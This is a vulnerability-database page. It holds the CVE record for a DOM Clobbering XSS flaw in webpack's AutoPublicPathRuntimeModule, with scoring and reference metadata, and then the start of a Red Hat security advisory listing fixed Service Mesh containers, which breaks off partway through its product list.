Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-43788 (GCVE-0-2024-43788)
Vulnerability from cvelistv5 – Published: 2024-08-27 17:07 – Updated: 2025-01-09 17:41
VLAI?
EPSS
Summary
Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:webpack:webpack:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "webpack",
"vendor": "webpack",
"versions": [
{
"lessThan": "5.94.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43788",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T18:09:32.950161Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-09T17:41:35.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "webpack",
"vendor": "webpack",
"versions": [
{
"status": "affected",
"version": "\u003e= 5.0.0-alpha.0, \u003c 5.94.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-03T14:51:39.140Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"name": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270"
},
{
"name": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"name": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"tags": [
"x_refsource_MISC"
],
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"name": "https://scnps.co/papers/sp23_domclob.pdf",
"tags": [
"x_refsource_MISC"
],
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"source": {
"advisory": "GHSA-4vvj-4cpr-p986",
"discovery": "UNKNOWN"
},
"title": "DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43788",
"datePublished": "2024-08-27T17:07:16.285Z",
"dateReserved": "2024-08-16T14:20:37.323Z",
"dateUpdated": "2025-01-09T17:41:35.616Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*\", \"versionEndExcluding\": \"5.94.0\", \"matchCriteriaId\": \"10BD162E-912D-4458-A67B-F7BC3602FDC5\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"}, {\"lang\": \"es\", \"value\": \"Webpack es un paquete de m\\u00f3dulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero tambi\\u00e9n es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el m\\u00f3dulo puede conducir a cross site scripting (XSS) en p\\u00e1ginas web donde est\\u00e1n presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotaci\\u00f3n de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a trav\\u00e9s de un c\\u00f3digo javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilizaci\\u00f3n de c\\u00f3digo en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la p\\u00e1gina web (por ejemplo, a trav\\u00e9s de una publicaci\\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\\u00f3digo js) que se encuentran en el c\\u00f3digo javascript existente para transformarlo en c\\u00f3digo ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificaci\\u00f3n desinfectados incorrectamente. Este problema se solucion\\u00f3 en la versi\\u00f3n 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.\"}]",
"id": "CVE-2024-43788",
"lastModified": "2024-09-03T15:15:15.937",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\", \"baseScore\": 6.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.6, \"impactScore\": 4.7}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 6.1, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 2.7}]}",
"published": "2024-08-27T17:15:07.967",
"references": "[{\"url\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Mitigation\", \"Technical Description\", \"Third Party Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-43788\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-27T17:15:07.967\",\"lastModified\":\"2024-09-03T15:15:15.937\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"},{\"lang\":\"es\",\"value\":\"Webpack es un paquete de m\u00f3dulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero tambi\u00e9n es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el m\u00f3dulo puede conducir a cross site scripting (XSS) en p\u00e1ginas web donde est\u00e1n presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotaci\u00f3n de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a trav\u00e9s de un c\u00f3digo javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilizaci\u00f3n de c\u00f3digo en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la p\u00e1gina web (por ejemplo, a trav\u00e9s de una publicaci\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\u00f3digo js) que se encuentran en el c\u00f3digo javascript existente para transformarlo en c\u00f3digo ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificaci\u00f3n desinfectados incorrectamente. Este problema se solucion\u00f3 en la versi\u00f3n 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"5.94.0\",\"matchCriteriaId\":\"10BD162E-912D-4458-A67B-F7BC3602FDC5\"}]}]}],\"references\":[{\"url\":\"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://research.securitum.com/xss-in-amp4email-dom-clobbering\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://scnps.co/papers/sp23_domclob.pdf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Technical Description\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-43788\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-27T18:09:32.950161Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:webpack:webpack:*:*:*:*:*:*:*:*\"], \"vendor\": \"webpack\", \"product\": \"webpack\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"5.94.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-27T18:11:53.603Z\"}}], \"cna\": {\"title\": \"DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)\", \"source\": {\"advisory\": \"GHSA-4vvj-4cpr-p986\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"webpack\", \"product\": \"webpack\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.0.0-alpha.0, \u003c 5.94.0\"}]}], \"references\": [{\"url\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"name\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"name\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"name\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"name\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"name\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-09-03T14:51:39.140Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-43788\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-01-09T17:41:35.616Z\", \"dateReserved\": \"2024-08-16T14:20:37.323Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-27T17:07:16.285Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
RHSA-2024_7724
Vulnerability from csaf_redhat - Published: 2024-10-07 09:22 - Updated: 2024-12-18 04:38Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7724",
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11",
"tracking": {
"current_release_date": "2024-12-18T04:38:20+00:00",
"generator": {
"date": "2024-12-18T04:38:20+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:7724",
"initial_release_date": "2024-10-07T09:22:37+00:00",
"revision_history": [
{
"date": "2024-10-07T09:22:37+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:22:37+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:38:20+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.4 for RHEL 8",
"product": {
"name": "RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
